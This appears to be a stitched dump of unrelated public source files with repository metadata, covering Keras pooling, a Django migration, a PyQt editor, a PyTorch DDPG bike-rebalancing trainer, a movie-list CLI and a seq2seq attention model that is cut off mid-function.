x = Conv2D(classes, kernel_size=(3, 3), padding=padding, activation=None, name='5_conv')(x)
x = Reshape([classes])(x)
x = Activation('softmax')(x)
models = Model(inputs=inpt, outputs=x)
return models
def Rectified_Pooling(inpt, ps=2, filters=32, add_max=True, couple=False, dropout=True):
input_size = inpt.get_shape()[1]
xmax = MaxPooling2D(pool_size=(ps, ps), strides=(ps, ps), name=str(filters)+'_max')(inpt)
xs = []
for i in range(ps):
for j in range(ps):
x_ = Lambda(lambda x: x[:, i:input_size:ps, j:input_size:ps, :])(inpt)
xs.append(x_)
xs = Concatenate(axis=-1)(xs)
if couple:
xs = Dropout(rate=0.5)(xs)
# linear combination
xs = Conv2D(filters, kernel_size=(1, 1), padding=padding, activation=None, name=str(filters)+'_1conv1')(xs)
if dropout:
xs = Dropout(rate=0.5, name=str(filters)+'_delta')(xs)
if add_max:
xs = add(inputs=[xs, xmax], name=str(filters)+'_sum')
else:
xs = xs
return xs
| [
"mengxuez@yahoo.com"
] | mengxuez@yahoo.com |
11ace4adaf7b2348cdcb2bfda968fe574e5e91c5 | 516136cf8984312019edde657e93a338cce064f3 | /DCP_520.py | 71e42c2136934b79a9504b1f5bb259dfd1a69dff | [] | no_license | christiangalleisky/DailyCodingProblems500-550 | 4db4388f64c748294431e60ba5a8cde1790ae01a | db4e6b0a547e76258ce024c55d1748be017a78bb | refs/heads/master | 2022-12-17T16:58:39.838303 | 2020-09-20T17:32:14 | 2020-09-20T17:32:14 | 290,891,722 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 380 | py | def find_depth(tree):
depth = 0
while tree != '0':
tree = tree.replace('(00)', '0')
depth += 1
return depth
def find_depth_Ntime(tree):
max_depth = depth = 0
for char in tree:
if char == '(':
depth += 1
elif char == ')':
depth -= 1
max_depth = max(max_depth, depth)
return max_depth
| [
"noreply@github.com"
] | christiangalleisky.noreply@github.com |
0103ac6ed6f9aed7945817632289d3a4061d141c | 7fa283fc8a791cd85c35766952a352955c2b6b46 | /videorecs/recommend/migrations/0007_question.py | e3305e7d30fb6d2b0ca8da5223b825284d24da67 | [] | no_license | mpdominguez/personalize-video-recs | 8785b24fea5967b11bc268fb06c72c246f8df47f | 1bb9d86ba03db8ef862b7cad16c22d768b69a6f0 | refs/heads/master | 2020-07-07T22:29:38.273861 | 2019-08-21T19:14:10 | 2019-08-21T19:14:10 | 203,494,361 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 675 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.18 on 2019-05-01 12:28
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('recommend', '0006_reviews_timestamp'),
]
operations = [
migrations.CreateModel(
name='Question',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('question_text', models.CharField(max_length=200)),
('pub_date', models.DateTimeField(verbose_name='date published')),
],
),
]
| [
"mpdominguez@gmail.com"
] | mpdominguez@gmail.com |
359c2822e71c348ed169b57f8aa3b16971915434 | 5c4838565656a75b09502e6e60c7d78c8b196133 | /crawler/baike_spider/html_download.py | 0b0b78227a28ce428b8839a142df963fff3c8e0f | [] | no_license | huangshengda/toys | e2e1c2539df1d9f5c7df2431f3343e2a7017edf4 | 374c8ec60f3acbb479954d8202d74c97660ac158 | refs/heads/master | 2020-04-01T09:16:44.352742 | 2018-07-07T07:07:53 | 2018-07-07T07:07:53 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 240 | py | import urllib.request
class HtmlDownloader(object):
def download(self, url):
if url is None:
return None
response = urllib.request.urlopen(url)
if response.getcode() != 200:
return None
return response.read()
| [
"490641570@qq.com"
] | 490641570@qq.com |
fdc482ebab30deb95941025999cd0e9ef8238969 | b6cf41b1eadb6571e30998712da651ec62db07ad | /Gui/TextEdit.py | ceb67896e0bb84b333873a5b082f3dbedb16f3f7 | [] | no_license | fdanesse/CoralEditor | 8d1949ff86af61d44d573d544a3b76dbc182b5d4 | e42239f75ee921c99d13e60758b32ca5862c303f | refs/heads/master | 2021-08-14T07:14:19.203753 | 2017-11-15T00:06:11 | 2017-11-15T00:06:11 | 107,883,737 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,380 | py | #!/usr/bin/python3
# -*- coding: utf-8 -*-
import os
from PyQt5.QtCore import Qt
from PyQt5.QtCore import QEvent
from PyQt5.QtWidgets import QPlainTextEdit
from PyQt5.QtWidgets import QApplication
from PyQt5.QtGui import QPalette
from PyQt5.QtGui import QColor
from PyQt5.QtGui import QFont
from PyQt5.QtGui import QFontMetrics
from PyQt5.QtGui import QTextCharFormat
from PyQt5.QtGui import QKeyEvent
#from PyQt5.QtGui import QTextCursor
#from Gui.Syntax.PythonHighlighter import PythonHighlighter
class TextEdit(QPlainTextEdit):
# https://doc.qt.io/qt-5/qplaintextedit.html
# https://github.com/hugoruscitti/pilas/blob/e33bfd80a9c9faec432dbd3de1d82066b8704303/pilasengine/interprete/editorbase/editor_base.py
# http://www.binpress.com/tutorial/developing-a-pyqt-text-editor-part-2/145
# http://ftp.ics.uci.edu/pub/centos0/ics-custom-build/BUILD/PyQt-x11-gpl-4.7.2/doc/html/qtextedit.html
# http://nullege.com/codes/show/src@p@y@pyqt5-HEAD@examples@tools@customcompleter@customcompleter.py/92/PyQt5.QtWidgets.QTextEdit.textCursor
# http://nullege.com/codes/show/src@p@y@pyqt5-HEAD@examples@richtext@textedit@textedit.py/87/PyQt5.QtWidgets.QTextEdit.setFocus
# Ejemplos:
# https://stackoverflow.com/questions/31610351/qplaintextedit-thinks-its-modified-if-it-has-an-empty-text
# https://john.nachtimwald.com/2009/08/19/better-qplaintextedit-with-line-numbers/
# https://github.com/Werkov/PyQt4/blob/master/examples/demos/textedit/textedit.py
def __init__(self, parent, path=""):
#super().__init__()
super(TextEdit, self).__init__(parent)
self.parent = parent
self.path = path
font = QFont("Monospace", 8) #QFont()
#font.setFamily("Monospace")
font.setStyleHint(QFont.Monospace)
font.setStyle(QFont.StyleNormal)
font.setStyleStrategy(QFont.PreferDefault)
font.setWeight(QFont.ExtraLight)
font.setCapitalization(QFont.MixedCase)
font.setHintingPreference(QFont.PreferDefaultHinting)
font.setLetterSpacing(QFont.PercentageSpacing, 100.0)
font.setStretch(QFont.AnyStretch)
font.setBold(False)
font.setFixedPitch(True)
font.setItalic(False)
font.setKerning(True)
font.setOverline(False) # sobrelinea
#font.setPixelSize(8) #font.setPointSize(8) font.setPointSizeF(8)
font.setStrikeOut(False) # tachado
#font.setStyleName()
font.setUnderline(False)
#font.setWordSpacing(1)
print(font.toString())
charFormat = QTextCharFormat()
charFormat.setFont(font)
#self.setTabStopWidth(4)
self.setCursorWidth(5)
self.setCurrentCharFormat(charFormat)
#print(self.document().defaultTextOption())
#FIXME: Usaremos qss
pal = QPalette()
bgc = QColor(39, 40, 34)
pal.setColor(QPalette.Base, bgc)
textc = QColor(255, 255, 255)
pal.setColor(QPalette.Text, textc)
self.setPalette(pal)
self.setLineWrapMode(QPlainTextEdit.NoWrap)
#self.setTextBackgroundColor(QColor(0, 255, 255))
#self.setTextColor(QColor(0, 255, 255))
#self.setFontWeight(QFont.Normal)
#cursor = self.textCursor()
#cursor.movePosition(QTextCursor.End)
#self.setDocumentTitle("Coso")
#self.syntaxHighlighter = PythonHighlighter(self.document())
# Señales
#self.blockCountChanged.connect(self.__newBlock)
#self.cursorPositionChanged.connect()
#self.selectionChanged.connect(self.__changedSelection)
#self.textChanged.connect(self.__changedText)
#self.updateRequest.connect((const QRect &rect, int dy)
#self.modificationChanged.connect(self.__chanedModification)
#self.copyAvailable.connect(self.__copyAvailable)
#self.undoAvailable.connect(self.__undoAvailable)
#self.redoAvailable.connect(self.__redoAvailable)
if os.path.exists(self.path):
file = open(self.path, 'r')
data = file.read()
texto = self.__limpiar_codigo(data)
self.setPlainText(texto)
self.document().setModified(data != texto)
if data != texto:
print("El texto fue corregido al abrir el archivo.")
else:
self.setPlainText("#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\n")
self.document().setModified(True)
self.setFocus()
def getStatus(self):
"""
Si se modifica el texto, se puede guardar.
"""
return{
"modified": self.document().isModified(),
}
#def __chanedModification(self, changed):
# pass
# #print("Document changed:", changed)
#def __changedSelection(self):
# cursor = self.textCursor()
# selected = cursor.selectionEnd()-cursor.selectionStart()
# self.canSelectAll = selected < len(self.toPlainText())
#def __copyAvailable(self, available):
# self.canCopy = available
#def __undoAvailable(self, available):
# pass
# #print("Undo:", available)
#def __redoAvailable(self, available):
# pass
# #print("Redo:", available)
def keyPressEvent(self, event):
# https://doc.qt.io/qt-5/qt.html#Key-enum
if event.key() == Qt.Key_Tab:
event.ignore()
event.accept = True
for x in range(0, 4):
newevent = QKeyEvent(QEvent.KeyPress, Qt.Key_Space,
Qt.NoModifier, text=" ", autorep=False, count=1)
QApplication.postEvent(self, newevent)
else:
super(TextEdit, self).keyPressEvent(event)
event.accept = True
self.setFocus()
'''
def __newBlock(self, newBlockCount):
#print(newBlockCount)
def __changedText(self):
text = self.document().toPlainText()
text = self.__limpiar_codigo(text)
#self.setPlainText(text)
print(text, self.document().size())
'''
def __limpiar_codigo(self, texto):
limpio = ""
for line in texto.splitlines():
text_line = "%s\n" % (line.rstrip())
ret = text_line.replace("\t", " ")
for l in ret:
limpio = "%s%s" % (limpio, l)
return limpio | [
"fdanesse@gmail.com"
] | fdanesse@gmail.com |
554fcbec6789d459cf126740714d10da4e25a624 | 759e5e433a451ce21df48460e3e20a2d51006c0c | /3_zone_env/ddpg_pytorch_3zone_canWork.py | 7038fac2d9502ceb3442c19306ecdcd1b92255b8 | [] | no_license | maile2108/DDPG-With-EnvBSS | 4b717e77cadc8911e433c8b458d7706c12707172 | ccc0511e3774b264ea5f5a4b89959e8fba62e6c0 | refs/heads/master | 2023-02-26T02:26:54.431693 | 2021-01-30T05:36:10 | 2021-01-30T05:36:10 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 17,423 | py | '''
torch = 0.41
'''
from cvxpylayers.torch import CvxpyLayer
import torch
import cvxpy as cp
import torch.nn as nn
import torch.nn.functional as F
import numpy as np
import gym
import time
import matplotlib.pyplot as plt
import random
import gym_BSS # noqa: F401
import os
##################### hyper parameters ####################
MAX_EPISODES = 5000 # 200
MAX_EP_STEPS = 200
LR_A = 0.001 # learning rate for actor
LR_C = 0.002 # learning rate for critic
GAMMA = 0.9 # reward discount
TAU = 0.01 # 0.01 # soft replacement
MEMORY_CAPACITY = 1000 # 10000
c = 1 # 0.1
BATCH_SIZE = 64 # 32
RENDER = False
random_seed = 1
# ENV_NAME = 'Pendulum-v0'
ENV_NAME = 'BSSEnvTest-v0'
EVAL = True
eval_freq = 5000
SAVE_FILE = True
##################### global variables ####################
env = gym.make(ENV_NAME)
env = env.unwrapped
env.seed(1)
s_dim = env.observation_space.shape[0]
a_dim = env.action_space.shape[0]
a_bound = env.action_space.high
# store action before and after optLayer
before_opt = []
after_opt = []
##################### random seed ####################
torch.manual_seed(random_seed)
env.seed(random_seed)
np.random.seed(random_seed)
random.seed(random_seed)
env.action_space.seed(random_seed)
#################### testing part #################################
def evaluation(ddpg, filepath, eval_episode=10):
avg_reward = 0
avg = []
eval_env = gym.make(ENV_NAME)
eval_action = []
eval_state = []
# eval_env = env
eval_env.seed(random_seed + 100)
for eptest in range(eval_episode):
running_reward = 0
done = False
s = np.round(eval_env.reset())
while not done:
a_float = ddpg.choose_action(s, None)
a = torch.round(a_float)
diff = abs(torch.sum(a) - env.nbikes)
if torch.sum(a) < env.nbikes:
for a_idx in range(a_dim):
if a[a_idx] + diff <= a_bound[a_idx]:
a[a_idx] += diff
break
elif torch.sum(a) > env.nbikes:
for a_idx in range(a_dim):
if a[a_idx] - diff >= 0:
a[a_idx] -= diff
break
s_, r, done, info = eval_env.step(a)
s = s_
running_reward = running_reward + r
print('Episode {}\tReward: {} \t AvgReward'.format(eptest, running_reward))
avg_reward = avg_reward + running_reward
avg.append(running_reward)
avg_reward = avg_reward / eval_episode
print("------------------------------------------------")
print("Evaluation average reward :", avg_reward)
print("------------------------------------------------")
if SAVE_FILE:
np.save(filepath+'/{}bike_seed{}_memory{}_eval_action'.format(a_dim, random_seed, MEMORY_CAPACITY), np.array(eval_action))
np.save(filepath+'/{}bike_seed{}_memory{}_eval_state'.format(a_dim, random_seed, MEMORY_CAPACITY), np.array(eval_state))
return avg_reward
############################### DDPG ####################################
class AdaptiveParamNoiseSpec(object):
def __init__(self, initial_stddev=0.1, desired_action_stddev=0.2, adaptation_coefficient=1.01):
"""
Note that initial_stddev and current_stddev refer to std of parameter noise,
but desired_action_stddev refers to (as name notes) desired std in action space
"""
self.initial_stddev = initial_stddev
self.desired_action_stddev = desired_action_stddev
self.adaptation_coefficient = adaptation_coefficient
self.current_stddev = initial_stddev
def adapt(self, distance):
if distance > self.desired_action_stddev:
# Decrease stddev.
self.current_stddev /= self.adaptation_coefficient
else:
# Increase stddev.
self.current_stddev *= self.adaptation_coefficient
def get_stats(self):
stats = {
'param_noise_stddev': self.current_stddev,
}
return stats
def __repr__(self):
fmt = 'AdaptiveParamNoiseSpec(initial_stddev={}, desired_action_stddev={}, adaptation_coefficient={})'
return fmt.format(self.initial_stddev, self.desired_action_stddev, self.adaptation_coefficient)
def ddpg_distance_metric(actions1, actions2):
"""
Compute "distance" between actions taken by two policies at the same states
Expects numpy arrays
"""
diff = actions1-actions2
mean_diff = np.mean(np.square(diff), axis=0)
dist = sqrt(np.mean(mean_diff))
return dist
def hard_update(target, source):
for target_param, param in zip(target.parameters(), source.parameters()):
target_param.data.copy_(param.data)
class OptLayer(torch.nn.Module):
def __init__(self, D_in, D_out):
super(OptLayer, self).__init__()
self.W = torch.nn.Parameter(1e-3*torch.randn(D_out, D_in))
self.b = torch.nn.Parameter(1e-3*torch.randn(D_out))
u = torch.as_tensor(a_bound)
y = cp.Variable(D_out)
Wtilde = cp.Variable((D_out, D_in))
W = cp.Parameter((D_out, D_in))
b = cp.Parameter(D_out)
x = cp.Parameter(D_in)
obj = cp.Minimize(cp.sum_squares(Wtilde @ x - b - y))
cons = [cp.sum(y) == env.nbikes, 0 <= y, y <= u, Wtilde == W]
prob = cp.Problem(obj, cons)
self.layer = CvxpyLayer(prob, [W, b, x], [y])
def forward(self, x):
# when x is batched, repeat W and b
if x.ndim == 2:
batch_size = x.shape[0]
return self.layer(self.W.repeat(batch_size, 1, 1), self.b.repeat(batch_size, 1), x)[0]
else:
return self.layer(self.W, self.b, x)[0]
class ANet(nn.Module): # ae(s)=a
def __init__(self, s_dim, a_dim):
super(ANet, self).__init__()
self.fc1 = nn.Linear(s_dim, 32)
# self.fc1.weight.data.normal_(0, 0.1) # initialization
self.fc2 = nn.Linear(32, 32)
# self.fc2.weight.data.normal_(0, 0.1) # initialization
self.out = nn.Linear(32, a_dim)
# self.out.weight.data.normal_(0, 0.1) # initialization
self.opt_layer = OptLayer(a_dim, a_dim)
def forward(self, x):
x = self.fc1(x)
x = F.relu(x)
x = self.fc2(x)
x = F.relu(x)
x = self.out(x)
x = F.tanh(x)
# actions_value = x*2
# print('x: ', x)
# print('a_bound: ', a_bound)
# actions_value = x * a_bound
actions_value = x * 35
# print('=============')
# print('before opt: ', actions_value.data.numpy())
before_opt.append(actions_value.data.numpy())
# np.save('bike3_action_before', before_opt)
# opt_action = OptLayer(a_dim, a_dim)(x)
opt_action = self.opt_layer(actions_value)
# print('after opt: ', opt_action.data.numpy())
after_opt.append(opt_action.data.numpy())
# np.save('bike3_action_after', after_opt)
return opt_action
class CNet(nn.Module): # ae(s)=a
def __init__(self, s_dim, a_dim):
super(CNet, self).__init__()
'''
self.fcs = nn.Linear(s_dim, 32)
self.fca = nn.Linear(a_dim, 32)
self.fc2 = nn.Linear(32, 32)
self.out = nn.Linear(32, 1)
'''
self.l1 = nn.Linear(s_dim, 32)
self.l2 = nn.Linear(32 + a_dim, 32)
self.l3 = nn.Linear(32, 1)
def forward(self, s, a):
'''
x = self.fcs(s)
y = self.fca(a)
net = F.relu(x+y)
z = self.fc2(net)
z = F.relu(z)
actions_value = self.out(z)
return actions_value
'''
q = F.relu(self.l1(s))
q = F.relu(self.l2(torch.cat([q, a], 1)))
return self.l3(q)
class DDPG(object):
def __init__(self, a_dim, s_dim, a_bound,):
self.a_dim, self.s_dim, self.a_bound = a_dim, s_dim, a_bound,
self.memory = np.zeros(
(MEMORY_CAPACITY, s_dim * 2 + a_dim + 1), dtype=np.float32)
self.pointer = 0
# self.sess = tf.Session()
self.Actor_eval = ANet(s_dim, a_dim) # .type(torch.IntTensor)
self.Actor_target = ANet(s_dim, a_dim) # .type(torch.IntTensor)
self.Actor_perturbed = ANet(s_dim, a_dim) # .type(torch.IntTensor)
self.Critic_eval = CNet(s_dim, a_dim) # .type(torch.IntTensor)
self.Critic_target = CNet(s_dim, a_dim) # .type(torch.IntTensor)
self.ctrain = torch.optim.Adam(self.Critic_eval.parameters(), lr=LR_C)
self.atrain = torch.optim.Adam(self.Actor_eval.parameters(), lr=LR_A)
self.loss_td = nn.MSELoss()
def choose_action(self, s, para):
s = torch.unsqueeze(torch.FloatTensor(s), 0)
# s = torch.unsqueeze(torch.IntTensor(s), 0)
# self.Actor_eval.eval()
# self.Actor_perturbed.eval()
if para is None:
return self.Actor_eval(s)[0].detach() # ae(s)
else:
return self.Actor_perturbed(s)[0].detach()
def learn(self):
for x in self.Actor_target.state_dict().keys():
eval('self.Actor_target.' + x + '.data.mul_((1-TAU))')
eval('self.Actor_target.' + x +
'.data.add_(TAU*self.Actor_eval.' + x + '.data)')
for x in self.Critic_target.state_dict().keys():
eval('self.Critic_target.' + x + '.data.mul_((1-TAU))')
eval('self.Critic_target.' + x +
'.data.add_(TAU*self.Critic_eval.' + x + '.data)')
# soft target replacement
# self.sess.run(self.soft_replace) # 用ae、ce更新at,ct
record_range = min(self.pointer+1, MEMORY_CAPACITY)
indices = np.random.choice(record_range, size=BATCH_SIZE)
bt = self.memory[indices, :]
# '''
bs = torch.FloatTensor(bt[:, :self.s_dim])
ba = torch.FloatTensor(bt[:, self.s_dim: self.s_dim + self.a_dim])
br = torch.FloatTensor(bt[:, -self.s_dim - 1: -self.s_dim])
bs_ = torch.FloatTensor(bt[:, -self.s_dim:])
# '''
'''
bs = torch.IntTensor(bt[:, :self.s_dim])
ba = torch.IntTensor(bt[:, self.s_dim: self.s_dim + self.a_dim])
br = torch.IntTensor(bt[:, -self.s_dim - 1: -self.s_dim])
bs_ = torch.IntTensor(bt[:, -self.s_dim:])
'''
a = self.Actor_eval(bs)
# loss=-q=-ce(s,ae(s))更新ae ae(s)=a ae(s_)=a_
q = self.Critic_eval(bs, a)
# 如果 a是一个正确的行为的话,那么它的Q应该更贴近0
loss_a = -torch.mean(q)
# print('q: ', q)
# print('loss_a: ', loss_a)
self.atrain.zero_grad()
loss_a.backward()
self.atrain.step()
# print('atrain grad: ', self.atrain.grad)
# print("===================")
# for p in self.Actor_eval.parameters():
# print(p.name, p.requires_grad, p.grad.norm())
# 这个网络不及时更新参数, 用于预测 Critic 的 Q_target 中的 action
a_ = self.Actor_target(bs_)
# 这个网络不及时更新参数, 用于给出 Actor 更新参数时的 Gradient ascent 强度
q_ = self.Critic_target(bs_, a_)
q_target = br+GAMMA*q_ # q_target = 负的
# print('q_target: ', q_target)
q_v = self.Critic_eval(bs, ba)
# print('q_v: ', q_v)
td_error = self.loss_td(q_target, q_v)
# td_error=R + GAMMA * ct(bs_,at(bs_))-ce(s,ba) 更新ce ,但这个ae(s)是记忆中的ba,让ce得出的Q靠近Q_target,让评价更准确
# print('td_error: ', td_error)
self.ctrain.zero_grad()
td_error.backward()
self.ctrain.step()
def store_transition(self, s, a, r, s_):
transition = np.hstack((s, a, [r], s_))
# replace the old memory with new memory
index = self.pointer % MEMORY_CAPACITY
self.memory[index, :] = transition
self.pointer += 1
def perturb_actor_parameters(self, param_noise):
"""Apply parameter noise to actor model, for exploration"""
hard_update(self.Actor_perturbed, self.Actor_eval)
params = self.Actor_perturbed.state_dict()
for name in params:
if 'ln' in name:
pass
param = params[name]
random = torch.randn(param.shape)
# if use_cuda:
# random = random.cuda()
param += random * param_noise.current_stddev
############################### training ####################################
filepath = "./pytorch_result_{}".format(MEMORY_CAPACITY)
if not os.path.exists(filepath):
os.mkdir(filepath)
Rs = []
ewma_reward = 0 # EWMA reward for tracking the learning progress
ewma_reward_s = []
eva_reward = []
store_action = []
store_state = []
param_noise = AdaptiveParamNoiseSpec(
initial_stddev=0.05, desired_action_stddev=0.3, adaptation_coefficient=1.05)
# param_noise = None
ddpg = DDPG(a_dim, s_dim, a_bound)
var = 3 # control exploration
t1 = time.time()
for i in range(MAX_EPISODES):
s = np.round(env.reset())
old_s = s
ep_reward = 0
done = False
j = 0
noise_counter = 0
if param_noise is not None:
ddpg.perturb_actor_parameters(param_noise)
# for j in range(MAX_EP_STEPS):
while not done:
if RENDER:
env.render()
# Add exploration noise
a_float = ddpg.choose_action(s, param_noise)
# Make it int and sum up to nbikes
a = torch.round(a_float)
diff = abs(torch.sum(a) - env.nbikes)
if torch.sum(a) < env.nbikes:
for a_idx in range(a_dim):
if a[a_idx] + diff <= a_bound[a_idx]:
a[a_idx] += diff
break
elif torch.sum(a) > env.nbikes:
for a_idx in range(a_dim):
if a[a_idx] - diff >= 0:
a[a_idx] -= diff
break
# print('===========In main: ===============')
# print('s = ', s)
# print('old a = ', a_float)
# print('a = ', a)
# add randomness to action selection for exploration
# a = np.clip(np.random.normal(a, var), -2, 2)
# print('a: ', a)
# print('store_action: ', store_action)
store_action.append(a.numpy())
store_state.append((s))
s_, r, done, info = env.step(a)
ddpg.store_transition(s, a, r, s_)
if ddpg.pointer > c*MEMORY_CAPACITY:
var *= .9995 # decay the action randomness
# print('learn!!!!')
ddpg.learn()
if EVAL and (ddpg.pointer + 1) % eval_freq == 0:
eva_reward.append(evaluation(ddpg, filepath))
noise_counter += 1
old_s = s
s = s_
ep_reward += r
'''
if j == MAX_EP_STEPS-1:
print('Episode:', i, ' Reward: %i' %
int(ep_reward), 'Explore: %.2f' % var, )
if ep_reward > -300:
RENDER = True
break
j += 1
'''
ewma_reward = 0.05 * ep_reward + (1 - 0.05) * ewma_reward
# print('===========In main: ===============')
# print('s = ', old_s)
# # print('old a = ', a_float)
# print('a = ', a)
print({
'episode': i,
'ewma reward': ewma_reward,
# 'ep reward': R,
'Explore': var
})
Rs.append(ep_reward)
ewma_reward_s.append(ewma_reward)
if SAVE_FILE:
np.save(filepath+'/{}bike_seed{}_memory{}_episode_reward'.format(a_dim, random_seed, MEMORY_CAPACITY), np.array(Rs))
np.save(filepath+'/{}bike_seed{}_memory{}_ewma_reward'.format(a_dim, random_seed, MEMORY_CAPACITY), np.array(ewma_reward_s))
np.save(filepath+'/{}bike_seed{}_memory{}_action'.format(a_dim, random_seed, MEMORY_CAPACITY), np.array(store_action))
np.save(filepath+'/{}bike_seed{}_memory{}_state'.format(a_dim, random_seed, MEMORY_CAPACITY), np.array(store_state))
np.save(filepath+'/{}bike_seed{}_memory{}_before_opt'.format(a_dim, random_seed, MEMORY_CAPACITY), np.array(before_opt))
np.save(filepath+'/{}bike_seed{}_memory{}_after_opt'.format(a_dim, random_seed, MEMORY_CAPACITY), np.array(after_opt))
if EVAL:
np.save(filepath+'/{}bike_seed{}_memory{}_eval_reward'.format(a_dim, random_seed, MEMORY_CAPACITY), np.array(eva_reward))
Rs = np.array(Rs)
ewma_reward_s = np.array(ewma_reward_s)
print('')
print('---------------------------')
print('Average reward per episode:', np.average(Rs))
"""
Save model
"""
# np.save('ewma_reward', ewma_reward_s)
# np.save('ep_reward', Rs)
xAxis = np.arange(MAX_EPISODES)
yAxis = ewma_reward_s
plt.plot(xAxis, yAxis)
plt.title('Memory: {}, Batch size: {}, Episode: {}'.format(
MEMORY_CAPACITY, BATCH_SIZE, MAX_EPISODES))
plt.xlabel('Episode')
plt.ylabel('EWMA Reward')
plt.show()
# print('Running time: ', time.time() - t1)
| [
"sandy861003@gmail.com"
] | sandy861003@gmail.com |
649cdbedd9d4b388cfba6bf8e5268e049d220b82 | 336b5320dc184a8e7fa41a52b22faf656d1db671 | /ch17/movies/ui.py | cf0e68924c778558bbd2d49f6234a49532c8c666 | [
"MIT"
] | permissive | nemanjaunkovic/SolutionsMurachPythonProgramming | 59e9c1d496735643e257cac2ced0c54fd669aaa0 | 4f30c334c626ab7f3304e81fc15e81aa38363541 | refs/heads/master | 2021-05-16T13:51:38.910130 | 2018-01-24T21:06:10 | 2018-01-24T21:06:10 | 117,701,811 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,944 | py | #!/usr/bin/env/python3
import db
from objects import Movie
def display_title():
print("The Movie List program")
print()
display_menu()
def display_menu():
print("COMMAND MENU")
print("cat - View movies by category")
print("year - View movies by year")
print("add - Add a movie")
print("del - Delete a movie")
print("exit - Exit program")
print()
def display_categories():
print("CATEGORIES")
categories = db.get_categories()
for category in categories:
print(str(category.id) + ". " + category.name)
print()
def display_movies(movies, title_term):
print("MOVIES - " + title_term)
line_format = "{:3s} {:37s} {:6s} {:5s} {:10s}"
print(line_format.format("ID", "Name", "Year", "Mins", "Category"))
print("-" * 64)
for movie in movies:
print(line_format.format(str(movie.id), movie.name,
str(movie.year), str(movie.minutes),
movie.category.name))
print()
def display_movies_by_category():
category_id = int(input("Category ID: "))
category = db.get_category(category_id)
if category == None:
print("There is no category with that ID.\n")
else:
print()
movies = db.get_movies_by_category(category_id)
display_movies(movies, category.name.upper())
def display_movies_by_year():
year = int(input("Year: "))
print()
movies = db.get_movies_by_year(year)
display_movies(movies, str(year))
def add_movie():
name = input("Name: ")
year = int(input("Year: "))
minutes = int(input("Minutes: "))
category_id = int(input("Category ID: "))
category = db.get_category(category_id)
if category == None:
print("There is no category with that ID. Movie NOT added.\n")
else:
movie = Movie(name=name, year=year, minutes=minutes,
category=category)
db.add_movie(movie)
print(name + " was added to database.\n")
def delete_movie():
movie_id = int(input("Movie ID: "))
db.delete_movie(movie_id)
print("Movie ID " + str(movie_id) + " was deleted from database.\n")
def main():
db.connect()
display_title()
display_categories()
while True:
command = input("Command: ")
if command == "cat":
display_movies_by_category()
elif command == "year":
display_movies_by_year()
elif command == "add":
add_movie()
elif command == "del":
delete_movie()
elif command == "exit":
break
else:
print("Not a valid command. Please try again.\n")
display_menu()
db.close()
print("Bye!")
if __name__ == "__main__":
main()
| [
"nemanja_unkovic@yahoo.com"
] | nemanja_unkovic@yahoo.com |
4905b8b383ffb92231f4b346797d57075d31974b | 3fc23e1c82b48c7bbc84fae1df2d0a3f28cb3ba2 | /logicalforms/SP_emrQA/models/seq2seq_Luong.py | 48d68fc1de7eb8355b1ee001e2a086f807d8798e | [] | no_license | ndobb/AdvancingSeq2Seq | 29dae6a1a1d28a573f6f861ba036511e81bb94db | cb564e114ed7b062626797319b48a1c07a6e7cae | refs/heads/master | 2023-03-20T08:36:24.624388 | 2021-03-15T01:02:42 | 2021-03-15T01:02:42 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,986 | py | import torch
from torch import nn, optim
import torch.nn.functional as F
import numpy as np
from torch.autograd import Variable
import time
# import matplotlib
# matplotlib.use("Agg")
# Just modifying bowser model and making it a simple seq2seq network
USE_CUDA = True if torch.cuda.is_available() else False
class EncoderRNN(nn.Module):
def __init__(self, input_size, hidden_size, n_layers=1, dropout=0.1):
super(EncoderRNN, self).__init__()
# input_size is actually the vocab size
self.input_size = input_size
self.hidden_size = hidden_size
self.n_layers = n_layers
self.dropout = dropout
self.embedding = nn.Embedding(input_size, hidden_size)
self.gru = nn.GRU(hidden_size, hidden_size, n_layers, batch_first=True, dropout=self.dropout, bidirectional=True)
def forward(self, input_seqs, input_lengths, hidden=None):
# Note: we run this all at once (over multiple batches of multiple sequences)
#input_seqs: [Batch x Seq]
#input_lengths: [Batch]
embedded = self.embedding(input_seqs) #embedded: [Batch x Seq]
packed = torch.nn.utils.rnn.pack_padded_sequence(embedded, input_lengths, batch_first=True)
outputs, hidden = self.gru(packed, hidden)
outputs, output_lengths = torch.nn.utils.rnn.pad_packed_sequence(outputs, batch_first=True) # unpack (back to padded)
#outputs = outputs[:, :, :self.hidden_size] + outputs[:, :, self.hidden_size:] # Sum bidirectional outputs
return outputs, hidden #encoder outpus: [Batch x Seq x hidden], hidden: not really used so does not matter
class Attn(nn.Module):
def __init__(self, method, hidden_size, soft=True, D= 0):
super(Attn, self).__init__()
self.method = method
self.hidden_size = hidden_size
self.soft = soft
if self.method == 'general':
self.attn = nn.Linear(self.hidden_size, hidden_size)
elif self.method == 'concat':
self.attn = nn.Linear(self.hidden_size * 2, hidden_size)
self.v = nn.Parameter(torch.randn(1,hidden_size,1))
if self.method == 'location':
self.attn = nn.Linear(self.hidden_size, 1)
if not(soft):
self.sig = nn.Sigmoid()
self.D = D
self.Vp = nn.Parameter(torch.randn(self.hidden_size, 1))
self.Wp = nn.Linear(self.hidden_size, self.hidden_size)
#Encoder is done once for all of B and all of S
#Decoder is done for all B but only 1 for s at a time.
def forward(self, hidden, encoder_outputs, X_lengths = None):
#hidden: current hidden state of the decoder [1 x Batch x hidden] (since not bidirectional)
#encoder_outputs : [Batch x Seq x hidden]
#hidden.transpose(0,1).transpose(1,2): [Batch x hidden x 1]
#print("encoder outputs shape", encoder_outputs.shape)
#print("hidden passed in", hidden.transpose(0,1).transpose(1,2).shape)
if self.method in ['dot', 'general', 'concat']:
attn_energies_3 = self.score_3(hidden.transpose(0,1).transpose(1,2), encoder_outputs)
attn_energies_3 = attn_energies_3.view(attn_energies_3.shape[0], attn_energies_3.shape[1])
#attn_energies_3: [Batch x Seq]
